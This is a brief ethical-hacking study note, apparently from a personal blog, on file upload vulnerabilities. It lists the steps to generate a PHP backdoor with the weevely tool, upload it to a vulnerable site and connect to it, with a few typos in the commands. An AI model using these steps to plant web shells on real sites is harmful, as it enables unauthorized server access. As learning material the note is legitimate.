Ethical Hacking

EXPLOITATION -File Upload VULNS

Simple type of vulnerabilities.

Allow users to upload executable files such as PHP.

Upload a PHP shell or backdoor, ex:weevly

1. Generate backdoor

weevly generage [password] [file name]

2. Upload the generated file.

3. Connect to it

weevly [URL to file] [password]

4. Find out how to use weevly

help

相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
原文地址:https://www.cnblogs.com/keepmoving1113/p/12274415.html